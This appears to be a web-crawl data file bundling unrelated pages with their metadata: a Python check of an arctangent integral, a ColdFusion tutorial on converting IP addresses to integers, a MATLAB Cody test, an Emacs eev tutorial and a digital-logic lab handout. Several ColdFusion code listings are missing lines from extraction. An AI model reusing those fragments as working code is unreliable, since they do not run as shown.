{"ft_lang_label":"__label__en","ft_lang_prob":0.5456011,"math_prob":1.00001,"size":387,"snap":"2021-43-2021-49","text_gpt3_token_len":104,"char_repetition_ratio":0.09921671,"word_repetition_ratio":0.0,"special_character_ratio":0.26873386,"punctuation_ratio":0.12162162,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000092,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-28T03:05:42Z\",\"WARC-Record-ID\":\"<urn:uuid:27db0ef0-d8b6-461b-a36e-52f30c012a45>\",\"Content-Length\":\"34422\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c36ba0c-0cf7-4204-ba32-3f322a0a8fc7>\",\"WARC-Concurrent-To\":\"<urn:uuid:6af974c3-6c84-40cd-a906-20727672c865>\",\"WARC-IP-Address\":\"216.239.34.21\",\"WARC-Target-URI\":\"https://socratic.org/questions/int-0-1-1-x-2-1\",\"WARC-Payload-Digest\":\"sha1:HIKBWCVT5DE3FWKKKF2SV4NM5QVYYAIS\",\"WARC-Block-Digest\":\"sha1:NROM3XLGGLQNJTUULDBZ5P6CDFNZEMN3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588246.79_warc_CC-MAIN-20211028003812-20211028033812-00667.warc.gz\"}"}
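Both answers above reach π/4 analytically via the substitution x = tan θ. As a sanity check that is not part of the original page, a simple midpoint Riemann sum in Python gives the same value numerically and matches the antiderivative arctan(x) evaluated at the limits:

```python
import math

# Numerical cross-check of the result derived above:
#   integral from 0 to 1 of 1/(x^2 + 1) dx = pi/4 = arctan(1) - arctan(0)

def f(x):
    return 1.0 / (x * x + 1.0)

n = 100_000                          # number of midpoint-rule slices
h = 1.0 / n
approx = sum(f((i + 0.5) * h) for i in range(n)) * h

print(approx)                        # ~0.7853981633974...
print(math.pi / 4)                   # 0.7853981633974483
print(math.atan(1) - math.atan(0))   # same value, from the antiderivative
```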
https://www.bennadel.com/blog/1830-converting-ip-addresses-to-and-from-integer-values-with-coldfusion.htm
[ "On User Experience (UX) Design, JavaScript, ColdFusion, Node.js, Life, and Love.\n\n# Converting IP Addresses To And From Integer Values With ColdFusion\n\nTags: ColdFusion\n\nI've been playing with my bits a lot lately, parsing RGB colors and embedding secret messages inside image data; but, bit manipulation is still something that feels somewhat awkward to me. I guess I live in a base10 (decimal) world and it's hard for me to think in terms of base2 (binary). As such, when a conversation about IP-to-Integer conversion popped up on my InputBaseN() / FormatBaseN() post, I figured it would be a great opportunity for me to strengthen my bit-manipulation skills. I know converting an IP address to an integer (and back) is something that's been done a million times over; but for me, personally, it's new and ripe for practice.\n\nIn an IP to Integer conversion, we want to take an IP address string value, such as \"70.112.108.147\", and convert it into an integer value, such as 1181772947. Typically, this is done for storage and comparison purposes - I'm told it's both easier and faster to store and compare two integer values than it is two string values. Database philosophy aside, though, this value conversion is done in a bit-wise manner.\n\nBefore we get into the code, let's think about what needs to be done. Each part (octet) of an IP address consists of a single number whose value ranges between 0-255. Furthermore, each decimal number (in general) can be represented in binary as a string of bits. When we combine the individual parts of an IP address, we have to form a single integer value; but, we have to do this in such a way that none of the underlying bits overlap.", null, "As you can see, our final integer value is not much more than a glorified bit-mask in which each \"flag\" is represented, not by a single bit, but rather by 8 bits. To make sure that the \"flags\" (IP octet values) remain intact during the conversion, we have to shift them over by multiples of 8 as we add them together.\n\nNow that we see what we're trying to do, let's take a look at the ColdFusion code. In this first demo, we're going to convert an IP address into an integer:\n\n``````<!--- Set the IP address. --->\n\n<!--- Break the IP address into numeric units. --->\n<cfset ipParts = listToArray( ipAddress, \".\" ) />\n\n<!--- Create a running total for our numeric IP equivalent. --->\n<cfset ipNumber = 0 />\n\n<!---\nLoop over the parts of the array. For each part, we are going\nto let the 8 bits be continually shifted over to add exclusive\nbits to the running total.\n--->\n<cfloop\nindex=\"offset\"\nfrom=\"1\"\nto=\"#arrayLen( ipParts )#\"\nstep=\"1\">\n\n<!---\nSince each IP unit is a max of 255, we need to shift it\nover (bit-wise) for multiples of 8.\n--->\n<cfset ipNumber += bitSHLN(\nipParts[ offset ],\n((arrayLen( ipParts ) - offset) * 8)\n) />\n\n</cfloop>\n\n<!--- Output the resultant IP number equivalent. --->\nIP Number: #ipNumber#\n``````\n\nAs you can see, we have a running total to which we are adding each IP octet value. As we add the octet value, however, we are using ColdFusion's bitSHLN() method to perform a left-shift of the bits as explained in the diagram above. When we run the above code, we get the following output:\n\nIP Number: 1181772947\n\nTo go back the other way - convert an Integer to an IP Address - we basically do the above, but in reverse. Rather than shifting left, we'll shift right; rather than adding, we'll bitAnd().\n\n``````<!--- Set the IP numeric equivalent. 
--->\n<cfset ipNumber = 1181772947 />\n\n<!---\nCreate an array to hold the parts of the IP address as we\nparse them out of the interger equivalent.\n--->\n<cfset ipParts = [] />\n\n<!---\nNow, let's keep shifting the IP integer right by 8 bits\n(the number of bits required for 255) until we have nothing\nleft to shift over.\n--->\n<cfloop condition=\"val( ipNumber )\">\n\n<!---\nAt this point, the next value we want to get is in the\nlast 8 bits of the number. To get at it, we can bitAnd()\nwith 255, which is the bit configuration, 11111111.\n\nNOTE: Since we are getting the right-most IP units first,\nwe are going to PREpend the values to our IP array.\n--->\n<cfset arrayPrepend(\nipParts,\nbitAnd( ipNumber, 255 )\n) />\n\n<!---\nNow that we have gotten the right-most bits, let's shift\nthe number right by 8 bits. This will put the next IP\nunit we want to get in the last 8 bits of the number.\n--->\n<cfset ipNumber = bitSHRN( ipNumber, 8 ) />\n\n</cfloop>\n\n<!--- Output the parsed IP address. --->\nIP Address: #arrayToList( ipParts, \".\" )#<br />\n``````\n\nAs you can see, with each right-shift of the bits using ColdFusion's bitSHRN() function, the next octet becomes the right-most 8 bits of the running \"unTotal\". We then extract those right-most bits by bitAnd()'ing the value with 255. When we run the above code, we get the following output:\n\nAs you can see, we were able to convert the IP address to an integer and then back to an IP address.\n\nWhile this worked well, it really took ColdFusion to the limits of its integer capabilities. If we needed to left-shift just one or two more times, we would have required the creation of an integer too large for ColdFusion's (and Java's) basic data types. I don't know much of anything about the next generation of IP addresses - IPv6 - but I do know that it will require more bits than an Integer value will comfortably work with. As such, I thought it would be a fun experiment to perform this task again, this time with a few additional octets.\n\nBecause Java's int data type only allows for 32 bits, it means that ColdFusion, which is built on top of Java, also only allows for 32-bit integers. When dealing with extra octets, and subsequently extra bits, we'll need to go beyond basic data types. Luckily, Java provides for such cases with classes like BigInteger. In the following demos, all bit manipulation and addition will need to be done through BigInteger instances.\n\nFirst, let's convert our IP address to an integer:\n\n``````<!--- Set the LARGER address. --->\n\n<!--- Break the IP address into numeric units. --->\n<cfset ipParts = listToArray( ipAddress, \".\" ) />\n\n<!---\nCreate a running total for our numeric IP equivalent.\nBecause our running total must hold the VERY large value,\nwe need to use Java's BigInteger.\n--->\n<cfset ipNumber = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", \"0\" ) )\n/>\n\n<!---\nLoop over the parts of the array. For each part, we are going\nto let the 8 bits be continually shifted over to add exclusive\nbits to the running total.\n--->\n<cfloop\nindex=\"offset\"\nfrom=\"1\"\nto=\"#arrayLen( ipParts )#\"\nstep=\"1\">\n\n<!---\nSince each IP unit is a max of 255, we need to shift it\nover (bit-wise) for multiples of 8. 
However, since the\namount we are shifting by can be very large, we need to\ncreate an intermediary BigInteger to hold this value.\n--->\n<cfset ipShift = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", ipParts[ offset ] ) )\n/>\n\n<!---\nShift the current value by multiples of 8 bits and add\nthe shifted value to the running total.\n--->\nipShift.shiftLeft(\njavaCast(\n\"int\",\n((arrayLen( ipParts ) - offset) * 8)\n)\n)\n) />\n\n</cfloop>\n\n<!--- Output the resultant IP number equivalent. --->\nIP Number: #ipNumber.toString()#\n``````\n\nAs you can see this time, our IP address has two more octets: \"123.123\". Because of this, we need to play with more bits than a standard int value can hold. Java's BigInteger class allows for very large integer manipulation with a fairly easy API. Notice that when we create a BigInteger class instance, we have to initialize it with a string value rather than a numeric value; this is due to the fact that the initial value might be larger than an int data type can hold. Likewise, when we retreive the value from a BigInteger instance, we have to retreive it as a string. When we run the above code, we get the following output:\n\nIP Number: 77448671886203\n\nGoing back the other way - Integer to IP Address - we need to do the above in reverse:\n\n``````<!---\nSet the IP numeric equivalent. Because this is such a huge\nnumber, we are going to have to use Java's BigInteger to\nmodel and mutate it.\n--->\n<cfset ipNumber = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", \"77448671886203\" ) )\n/>\n\n<!---\nSince big integers require other big intergers for\nmathematical forumuls, let's create one to represent 255. This\nwill be ANDed with the IP number as we parse it.\n--->\n<cfset bigInt255 = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", \"255\" ) )\n/>\n\n<!---\nCreate an array to hold the parts of the IP address as we\nparse them out of the interger equivalent.\n--->\n<cfset ipParts = [] />\n\n<!---\nNow, let's keep shifting the IP integer right by 8 bits\n(the number of bits required for 255) until we have nothing\nleft to shift over.\n--->\n<cfloop condition=\"val( ipNumber.toString() )\">\n\n<!---\nAt this point, the next value we want to get is in the\nlast 8 bits of the number. To get at it, we can bitAnd()\nwith 255, which is the bit configuration, 11111111.\n--->\n<cfset arrayPrepend(\nipParts,\nipNumber.and( bigInt255 ).toString()\n) />\n\n<!---\nNow that we have gotten the right-most bits, let's shift\nthe number right by 8 bits. This will put the next IP\nunit we want to get in the last 8 bits of the number.\n--->\n<cfset ipNumber = ipNumber.shiftRight(\njavaCast( \"int\", 8 )\n) />\n\n</cfloop>\n\n<!--- Output the parsed IP address. --->\nIP Address: #arrayToList( ipParts, \".\" )#<br />\n``````\n\nTo get the right-most 8 bits of the BigInteger value, we need to bit-AND it with 255. While 255 could easily fit into an int data type, since all math performed with a BigInteger needs to be done with BigIntegers, we needed to create a BigInteger representation of 255. Other than this new data type, the overall algorithm is practically unchanged.\n\nNow that I've had to do this and explain it, I'm starting to feel much more comfortable with bit-wise manipulation. 
I know that there are easier ways to perform IP-to-Integer conversions (such as multiplying by powers of 255); but, I think that doing it this way, with explicit bit-shifting, really gets you to think about the underlying mechanics of what is taking place.", null, "Hi,\n\nThe problem with your first solution is that for any IP adresse in the upper half of the IPv4 pool (> 128.0.0.1) coldfusion will answer with a negative number, ex:\n\nIP Number: -1435472749\n\nColdfusion bit operations are working on 32 bits signed integer, while it's possible to build bigger integer (up to 40 bits) using standard multiply operation\n\nAs for IPv6, it a 128 bits integer, usually coded in the hexadecimal form, of height 16bits blocks:\n1fff:0000:0a88:85a3:0000:0000:ac1f:8001\n\nIt's easier to convert to decimal form: just remove the ':' and convert from hex to decimal (well, with a system supporting 128 integers obviously).", null, "Thumbs up for creativity ;)\nAlways did this in more conventional way, with reg. expressions and listGetAt.", null, "@Silmaril,\n\nI am not sure what you are saying about the negative number. Remember, we don't really *care* what the integer is - it's just a collection of bits. From an INT standpoint, the left-most bit might be for signing; but, from a bit-mask standpoint, it's just another bit that can be shifted.\n\nI tried plugging in 170 as the first octet and got the following results:\n\nIP Number: -1435472749\n\nThen, going from -1435472749 back to an IP address, I got the following:\n\nAs you can see, the bit-wise manipulation was not affected by the use of the signed bit.\n\nAs for the IPv6, I tried looking them up last night, but I didn't read too much on them.", null, "@Ben\n\nYes indeed it's reversible, but the main use of decimal based IP addresse is for comparaison for systems that cannot directly compare IP addresses, and while 128.0.0.1 is between 127.0.0.1 and 129.0.0.1, it will be harder to verify using a signed integer", null, "@Silmaril,\n\nAhh, I see what you're saying. Sorry - I'm not too familiar with the database concepts behind converting IP to integers; I was just using this as an experiment in bit manipulation. I'll have to learn up on that a bit - thanks.", null, "That should be: (such as multiplying by powers of 256)", null, "@Gary,\n\nAh good catch - I wasn't sure about that. I'll have to do some learning on that.", null, "Hi Ben. My programming knowledge a very low but i would try to understand why this is better than a string. my questen is, is this only for better performance? is this only for coldfusion or else php, c++ and so on?", null, "@Carsten,\n\nBit-wise manipulation, and this general approach, should be available in just about any language. In this post, I used ColdFusion, but then, I dipped down into Java to use the BigInteger class. I would assume that C++ has something similar. As for PHP, it definitely has bit manipulation - whether or not it can handle HUGE integers, I don't know.\n\nI think the use of numbers is for performance and, @Silmaril mentioned, the numbers allow you to compare ranges of IP address (something that you cannot easily do with string representations).", null, "Just as a footnote, Ben, MySQL has two handy functions: INET_ATON() to convert in IP string to int, and INET_NTOA() to go the other way.\n\nSaving IPs as ints rather than varchars can significantly reduce the storage size of a table with a lot of rows. 
Access logging tables where you're capturing visitor IPs are a prime candidate.", null, "@Julian,\n\nThat is awesome! Thanks for letting me know about that.", null, "Hi Ben, thank you for your article which really helped me a lot. I implemented a similar solution using T-SQL so, for reference, and if you don't mind, I'll add a link to it here. It may be useful to people in the future.\n\nhttps://gist.github.com/simonbingham/5000258", null, "@Simon,\n\nVery cool :)", null, "Here's a much easier and shorter way (one line) to convert an IPv4 address to a numeric value...\n\nIf you want to convert this (assume it's store in variable \"ip\"): \"12.48.40.0\"\n\nJust do this:\n\n(ListGetAt(ip, 4, \".\") + ListGetAt(ip, 3, \".\") * 256 + ListGetAt(ip, 2, \".\") * 256 * 256 + ListGetAt(ip, 1, \".\") * 256 * 256 * 256)", null, "" ]
[ null, "https://bennadel-cdn.com/resources/uploads/ip_to_number_bit_wise_conversion.gif", null, "https://www.gravatar.com/avatar/00382f2043769476dd53275ae700e08d", null, "https://www.gravatar.com/avatar/588213c960f7fba8cb6399924be155b8", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/00382f2043769476dd53275ae700e08d", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/de3fa229388a4f519cf0b71fc007b2e7", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/e197d92af94e05fc3ddcd3f4e04bdaa3", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/11f640042d172c1601f9a8d3341121a8", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/9456f0397f4d400301961c60b3fc24c4", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/d32e9545325d2671bb11e3d6a2e28f60", null, "https://www.gravatar.com/avatar/d504fefd75f32e502178ad74a7983ac0", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88145834,"math_prob":0.90542144,"size":14506,"snap":"2020-45-2020-50","text_gpt3_token_len":3718,"char_repetition_ratio":0.12929252,"word_repetition_ratio":0.21975407,"special_character_ratio":0.28277954,"punctuation_ratio":0.14564103,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9779207,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32],"im_url_duplicate_count":[null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-28T09:41:46Z\",\"WARC-Record-ID\":\"<urn:uuid:e8dbab5f-9ea5-4106-a73e-f013a6fe4e4f>\",\"Content-Length\":\"41808\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ea38e818-241e-49b9-a214-e3bbca088153>\",\"WARC-Concurrent-To\":\"<urn:uuid:22dde643-088c-4fd9-94bd-8753872a4031>\",\"WARC-IP-Address\":\"184.175.83.43\",\"WARC-Target-URI\":\"https://www.bennadel.com/blog/1830-converting-ip-addresses-to-and-from-integer-values-with-coldfusion.htm\",\"WARC-Payload-Digest\":\"sha1:V35MPUCISHQKUDS3ZIR26DU6YFM2R5FO\",\"WARC-Block-Digest\":\"sha1:7XNREOWST2XJAOTQSYLLUYVW242HV4VB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107897022.61_warc_CC-MAIN-20201028073614-20201028103614-00696.warc.gz\"}"}
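The ColdFusion article above performs the conversion with bitSHLN(), bitAnd() and, for more than four octets, java.math.BigInteger. As a hypothetical companion sketch (not from the article), the same shift-and-mask technique in Python; Python integers are arbitrary precision, so the six-octet case needs no special handling:

```python
# Same bit-shift technique as the ColdFusion example above, sketched in Python.
# Python integers are arbitrary precision, so no BigInteger equivalent is needed
# even for the six-octet example from the article.

def ip_to_int(ip: str) -> int:
    """Shift each octet left by multiples of 8 bits and accumulate."""
    parts = [int(p) for p in ip.split(".")]
    number = 0
    for i, octet in enumerate(parts):
        number += octet << ((len(parts) - 1 - i) * 8)
    return number

def int_to_ip(number: int, octets: int = 4) -> str:
    """Mask off the low 8 bits with 255, then shift right, once per octet."""
    parts = []
    for _ in range(octets):
        parts.insert(0, str(number & 255))
        number >>= 8
    return ".".join(parts)

print(ip_to_int("70.112.108.147"))            # 1181772947, as in the article
print(int_to_ip(1181772947))                  # 70.112.108.147
print(ip_to_int("70.112.108.147.123.123"))    # 77448671886203, the 6-octet case
print(int_to_ip(77448671886203, octets=6))    # 70.112.108.147.123.123
```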
https://it.mathworks.com/matlabcentral/cody/problems/528-find-the-largest-value-in-the-3d-matrix/solutions/1169247
[ "Cody\n\n# Problem 528. Find the largest value in the 3D matrix\n\nSolution 1169247\n\nSubmitted on 24 Apr 2017 by Arief Anbiya\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nA = 1:9; A=reshape(A,[3 1 3]); y_correct = 9; assert(isequal(islargest(A),y_correct))\n\n2   Pass\nA = 9:17; A=reshape(A,[3 1 3]); y_correct = 17; assert(isequal(islargest(A),y_correct))\n\n3   Pass\nA = []; A(:,:,1) = magic(5); A(:,:,1) = eye(5); A(:,:,1) = 40*ones(5); y_correct = 40; assert(isequal(islargest(A),y_correct))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5457467,"math_prob":0.9963597,"size":504,"snap":"2019-35-2019-39","text_gpt3_token_len":180,"char_repetition_ratio":0.15,"word_repetition_ratio":0.029411765,"special_character_ratio":0.42857143,"punctuation_ratio":0.26495728,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99102664,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-23T05:45:19Z\",\"WARC-Record-ID\":\"<urn:uuid:99a5c8a9-6edc-4e4a-83f0-77c865ec84b1>\",\"Content-Length\":\"72714\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71fdce1e-a862-4aaa-9ac4-5fc99e278ba7>\",\"WARC-Concurrent-To\":\"<urn:uuid:5b629ecb-24ac-4e6a-ad70-dbd45e69a935>\",\"WARC-IP-Address\":\"104.117.39.124\",\"WARC-Target-URI\":\"https://it.mathworks.com/matlabcentral/cody/problems/528-find-the-largest-value-in-the-3d-matrix/solutions/1169247\",\"WARC-Payload-Digest\":\"sha1:FDVSODWCHL2G7TVARNMCGVP4G7EF65F5\",\"WARC-Block-Digest\":\"sha1:FPVS7SL4TBDUXSFN75FZJ22GWI3GVTBD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027317847.79_warc_CC-MAIN-20190823041746-20190823063746-00041.warc.gz\"}"}
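The Cody tests above exercise a function `islargest` that returns the overall maximum of a 3-D array; in MATLAB this is commonly written as `max(A(:))`. The sketch below is a hypothetical NumPy rendering of the same idea and tests (NumPy reshapes row-major rather than column-major as MATLAB does, which changes element placement but not the maximum):

```python
import numpy as np

# Flatten-and-max, the NumPy counterpart of MATLAB's max(A(:)).
def islargest(A):
    """Return the largest value anywhere in the array, regardless of shape."""
    return np.asarray(A).max()

A1 = np.arange(1, 10).reshape(3, 1, 3)   # mirrors A = 1:9 reshaped to [3 1 3]
A2 = np.arange(9, 18).reshape(3, 1, 3)   # mirrors A = 9:17
A3 = 40 * np.ones((5, 5, 1))             # mirrors the 40*ones(5) test

assert islargest(A1) == 9
assert islargest(A2) == 17
assert islargest(A3) == 40
print("all three checks pass")
```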
http://angg.twu.net/eev-intros/find-anchors-intro.html
[ "```(Re)generate: (find-anchors-intro)\nSource code: (find-eev \"eev-intro.el\" \"find-anchors-intro\")\nMore intros: (find-eev-quick-intro)\n(find-refining-intro)\nThis buffer is _temporary_ and _editable_.\nIt is meant as both a tutorial and a sandbox.\n\nNotes: this is an advanced tutorial!\nAnd it is very incomplete at the moment!\n\n1. Introduction\nThese sections of the main tutorial explain what anchors are, and\nexplain two simple ways of creating index/section anchor pairs:\n\n(find-eev-quick-intro \"8. Anchors\")\n(find-eev-quick-intro \"8.1. Introduction: `to'\")\n(find-eev-quick-intro \"8.3. Creating index/section anchor pairs\")\n(find-eev-quick-intro \"8.3. Creating index/section anchor pairs\" \"`M-A'\")\n(find-eev-quick-intro \"8.4. Creating e-script blocks\")\n(find-eev-quick-intro \"8.4. Creating e-script blocks\" \"`M-B'\")\n\nand these other sections explain briefly how hyperlinks to\nanchors in other files work,\n\n(find-eev-quick-intro \"8.5. Hyperlinks to anchors in other files\")\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\")\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\" \":anchor)\")\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\" \"makes (find-eev\")\n\nbut they stop right before explaining how to use them in a\npractical way, i.e., with few keystrokes. This intro is about\nthis.\n\n2. Shrinking\nWe saw in\n\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\" \"makes (find-eev\")\n\nthat these two hyperlinks are equivalent:\n\nThe first one searches for a string in \"eev-blinks.el\" in the\nnormal way; the second one treats the \"find-wottb\" as a tag,\nwraps it in `«»'s, and then searches for the anchor\n\nWe will refer to the operation that converts the hyperlink\n\nto\n\nas _shrinking_ the hyperlink. Eev has a key sequence that does\nthat, and for simplicity its behavor is just this: it looks at\nfirst element of the sexp at eol (the \"head\" of the sexp), and\nif it is a symbol that ends with \"file\" then rewrite the sexp\nreplacing the head symbol by it minus its suffix \"file\". That\nkey sequence is `M-h M--' (`ee-shrink-hyperlink-at-eol'), and its\nsource code is here:\n\nTry it on the two lines below:\n\n3. The preceding tag\nThe key sequence `M-h M-w' copies the current line to the kill\nring, highlights it for a fraction of a second, and shows the\nmessage\n\n\"Copied the current line to the kill ring - use C-y to paste\"\n\nin the echo area. Here are links to its source code and to a\nsection of a tutorial that mentions it:\n\n(find-eev \"eev-edit.el\" \"ee-copy-this-line-to-kill-ring\")\n(find-refining-intro \"3. Three buffers\" \"M-h M-w\")\n\nWhen we run `M-h M-w' with a numeric argument - for example, as\n`M-1 M-h M-w' - it highlights and copies to the kill ring the\n\"preceding tag\" instead of the current line; the \"preceding\ntag\" is the string between `«»'s in the anchor closest to the\npoint if we search backwards. As an exercise, type `M-1 M-h M-w'\nat some point below, and then use `M-h M-y' (`ee-yank-pos-spec')\nanchors.\n\n«first-anchor»\n«second-anchor»\n«third-anchor»\n\n(find-anchors-intro)\n\n[TO DO: write the other sections!]\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7713388,"math_prob":0.47788537,"size":3463,"snap":"2022-27-2022-33","text_gpt3_token_len":1038,"char_repetition_ratio":0.17432784,"word_repetition_ratio":0.035343036,"special_character_ratio":0.2717297,"punctuation_ratio":0.11080332,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.971059,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T02:56:23Z\",\"WARC-Record-ID\":\"<urn:uuid:b5c0d25b-32c7-4ced-8fb3-6ec615184d51>\",\"Content-Length\":\"7328\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:713db15d-3b14-4385-8067-20af65a65f05>\",\"WARC-Concurrent-To\":\"<urn:uuid:8ef419d2-2c8f-4a7b-b465-9e1bb416322b>\",\"WARC-IP-Address\":\"192.129.162.2\",\"WARC-Target-URI\":\"http://angg.twu.net/eev-intros/find-anchors-intro.html\",\"WARC-Payload-Digest\":\"sha1:EFNB5EMHE5ZNTCBWLVFUKJB6Z5MOOKUS\",\"WARC-Block-Digest\":\"sha1:IIGD2ZP3XXAIIFSPJTFX6RY2AWFWCALG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103620968.33_warc_CC-MAIN-20220629024217-20220629054217-00253.warc.gz\"}"}
https://www.aplusanswers.com/4-bit-full-adder-multiplexer-decoder-buffer/
[ "4-Bit Full Adder, Multiplexer, Decoder & Buffer\n\n4-Bit Full Adder, Multiplexer, Decoder & Buffer\n\nPrerequisites: Before beginning this laboratory experiment you must be able to:\n• Use Logisim.\n• Use Karnaugh maps.\n• Have completed Simulation Lab 1: Half Adder, Increment & Two’s Complement Circuit.\nEquipment: Personal computer and Logisim.\nObjectives: In this laboratory exercise, you will build and debug combinational logic subcircuits that perform arithmetic operations and data routing using Logisim.\nOutcomes: When you have completed the tasks in this experiment you will be able to design, build, test, debug, and imbed in a subcircuit, the following components:\n• A 2-to-1 multiplexer.\n• A 4-bit, 2-to-1 multiplexer.\n• A 1-to-2 decoder.\n• A 2-to-4 decoder.\n• A 4-to-16 decoder.\n• A 4-bit buffer.\nIntroduction\nIn Simulation Lab 1, you developed the increment circuit (which you will use in the program-counter portion of the microprocessor design) and the two’s-complement\n\ncircuit (which you will use as part of the arithmetic and logic unit [ALU] of the microprocessor design.) In this laboratory exercise you will continue constructing\n\nmodules that will eventually be used in assembling the microprocessor. Our concern in this laboratory exercise is with circuits that can perform binary addition (the\n\nadder) and with circuits that control the flow of data through our system (the multiplexer and decoder). You will eventually use the data-flow-control circuits you\n\ncreate in this lab exercise (a 4-bit 2-to-1 multiplexer, and a 4-to-16 decoder) to make the microprocessor self-capable of routing data to appropriate locations. The\n\nbinary-addition circuitry you will create (which is a 4-bit full adder) will contribute another piece to the ALU. You will also build a 4-bit three-state buffer to\n\ncontrol different signal sources sharing a common communication bus. Each circuit you build will be modularized by imbedding it in a subcircuit and these modules will\n\nbe used in subsequent labs to create more complex circuits. Using modules to create more complex modules is a powerful strategy that we will use throughout these\n\nsimulation laboratory exercises.\nAs we progress through these laboratory exercises, you will notice that the burden of circuit design will be shifted to you. Instead of giving you a circuit schematic\n\nand asking you to build, debug and modularize it, we will slowly begin to ask you to do more of the design work yourself. Any design work you are asked to do will be\n\nwell within your capabilities and will be supported by the lecture material, and your innate ability to recognize patterns.\nUsing the full-adder truth table, Table 1, write down the canonical SOP expressions for the Cout and SUM functions of a full adder. Using these canonical SOP\n\nexpressions, build, test and debug the circuits that realize the Cout and SUM functions using only NOR/NOR logic with Logisim. (Remember: you will need to design two\n\ncircuits: one for the SUM function and one for the Cout function. Both functions should share the same A, B and Cin inputs. No need for Karnaugh maps. Write down the\n\ncanonical POS expressions, then transform to use NOR/NOR logic. Hint: deMorgan’s law will help. When you need the complement of a variable, you may use inverters,\n\ni.e., NOT gates,\n2\nrather than using NOR gates connected as inverters.) 
Record the results of your validation tests in the form of a truth table in your lab template.\n\nBuild, debug and test a 1-bit full-adder circuit. Use NOR/NOR logic to implement your minimal POS form for the Cout function (use Figure 1 only as a guide since you\n\nneed to implement Cout using NOR/NOR logic) and construct the SUM function using a 3-input XOR gate. When you use XOR gate in Logisim, specify its “Multiple-Input\n\nBehavior” as “When an odd number are on”. Test your circuit. Record the results of these tests (in the form of a truth table) in your lab template.\nFigure 1. SOP implementation of a 1-bit full adder\nImbed your 1-bit full adder in a subcircuit (see Figure 2), label the subcircuit FA_1.\n3\nFigure 2. Subcircuit symbol for a 1-bit full adder\nUsing Figure 3 (2-bit full adder) as a guide, design a 4-bit full adder. The 4-bit full adder should accept two 4-bit numbers and a carry as input, and give one 4-bit\n\nsum and a 1-bit carry as output. Build, test and debug the 4-bit full adder. For naming inputs and outputs, see Figure 4 for reference. Test the circuit using a\n\nmulti-bit input pin and a hex digit display. Include the test results in the form of a truth table in your lab template. DO NOT test all input combinations. It is left\n\nto you to decide what constitutes a sufficient set of tests to make it likely that the 4-bit full-adder circuit is operating correctly. (One set of test inputs is not\n\nenough.) Justify in your lab template why successful completion of your tests proves beyond a reasonable doubt that your circuit is operating correctly. Once you are\n\nsatisfied that the circuit is working correctly, imbed the 4-bit adder in a subcircuit, label it “FA_4”, as shown in Figure 4.\n4\nFigure 4. Subcircuit symbol for a 4-bit full adder\nTask 2-4: Design, Build and Test a MUX Using NOR/NOR Logic\nNotation: We will use the following naming convention to represent a signal that is active when it is low, i.e., an active low signal: /~. Using this notation, the\n\nactive low signal Arith would be represented by /~Arith. Where a signal performs one operation when high (operation Y) and another operation when it is low (Z) we will\n\nlabel the signal Y/~Z. Using this notation, the complement of an active low signal is represented as: (/~Arith)’ .\nWhen we discuss the architecture of the microprocessor in later laboratory experiments, we will find that hardware is needed that allows the executing program to\n\nselect the route along which data flows. One component that we will need to perform this data routing function is the multiplexer, or MUX. A MUX is a device that can\n\nbe controlled to route one of its many input signals to its sole output. A truth table and symbol for the 1-bit 